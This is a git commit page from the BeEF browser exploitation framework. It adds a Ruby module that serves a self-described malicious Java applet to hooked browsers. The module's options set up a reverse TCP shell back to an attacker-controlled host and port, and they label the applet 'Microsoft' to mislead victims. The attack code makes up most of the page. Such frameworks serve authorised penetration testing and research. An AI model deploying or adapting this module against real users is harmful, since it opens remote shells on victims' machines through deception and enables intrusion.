(Fixes issue 434) First works with the malicious Java applet. Tons of work to come in the next releases (OMG) :-)
git-svn-id: https://beef.googlecode.com/svn/trunk@1387 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
This commit is contained in:
37
modules/exploits/java_payload/module.rb
Executable file
37
modules/exploits/java_payload/module.rb
Executable file
@@ -0,0 +1,37 @@
|
||||
#
|
||||
# Copyright 2011 Wade Alcorn wade@bindshell.net
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
class Java_payload < BeEF::Core::Command
|
||||
|
||||
def pre_send
|
||||
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/java_payload/AppletReverseTCP-0.2.jar', '/anti', 'jar')
|
||||
end
|
||||
|
||||
|
||||
def self.options
|
||||
return [
|
||||
{'name' => 'conn', 'ui_label' => 'Payload', 'value' => 'ReverseTCP'},
|
||||
{'name' => 'cbHost', 'ui_label' => 'Connect Back to Host', 'value' => '192.168.56.1'},
|
||||
{'name' => 'cbPort', 'ui_label' => 'Connect Back to Port', 'value' => '6666'},
|
||||
{'name' => 'applet_id', 'ui_label' => 'Applet id', 'value' => rand(32**20).to_s(32)},
|
||||
{'name' => 'applet_name', 'ui_label' => 'Applet name', 'value' => 'Microsoft'}
|
||||
]
|
||||
end
|
||||
|
||||
def post_execute
|
||||
save({'result' => @datastore['result']})
|
||||
end
|
||||
|
||||
end
|
||||
Reference in New Issue
Block a user